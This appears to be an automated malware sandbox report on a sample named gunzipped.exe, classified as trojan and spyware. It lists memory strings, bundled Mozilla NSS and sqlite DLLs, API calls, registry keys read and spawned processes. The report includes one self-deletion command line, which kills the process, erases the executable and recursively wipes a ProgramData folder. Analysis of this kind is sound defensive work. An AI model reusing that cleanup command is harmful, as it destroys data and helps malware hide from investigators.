Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: gunzipped.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: gunzipped.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://www.mozilla.com0
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007D1CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s,

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00404DEB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

Source: gunzipped.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_004030C7 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_0040315E CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_004045FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33727E
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309F37
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309320
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33FB2D
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307303
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308F07
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308B0F
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308B64
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30936B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307340
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309F48
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A74A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308F4E
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3073B3
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A3A7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308FAF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3093F6
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309FF8
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33D3E2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33EBC1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308BC2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30963B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308610
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308E1C
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33CE70
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F335A60
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308E69
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F303F55
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308A51
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3072A7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F319040
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A2AE
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309E96
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309EE9
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3092D0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A134
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309937
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308D3A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309522
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307529
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F304758
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309D17
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308505
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33BD05
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309165
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308D67
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33D954
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F301CD1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3085BD
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309DA1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3031AC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3095D4
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308DD7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309DDF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B9C3
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309430
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A038
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A439
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308817
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A078
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30747A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30947B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309860
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309061
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308C5F
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F319040
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309C42
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3094B0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A0BA
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308CA6
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3098AC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308881
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A0F2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3090F8
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3094FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3090DF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_004045FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3C90
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3480
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3060
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3AA0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B4B10

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 007B8C20 appears 41 times
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 004029E8 appears 47 times
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 007D2F70 appears 391 times

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_0019F1B7 NtQueryInformationProcess,

Source: gunzipped.exe, 00000000.00000003.306104413.0000000002E06000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000003.310975930.0000000002F9F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.319062332.0000000003341000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll8 vs gunzipped.exe

Source: sqlite3.dll.1.dr

Static PE information: Number of sections : 19 > 10

Source: gunzipped.exe

ReversingLabs: Detection: 53%

Source: C:\Users\user\Desktop\gunzipped.exe

File read: C:\Users\user\Desktop\gunzipped.exe

Jump to behavior

Source: gunzipped.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gunzipped.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068

Source: C:\Users\user\Desktop\gunzipped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 1068)

Source: C:\Users\user\Desktop\gunzipped.exe

File created: C:\Users\user\AppData\Local\Temp\nsy255E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/15@0/1

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\gunzipped.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_004040FF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4140:120:WilError_01

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
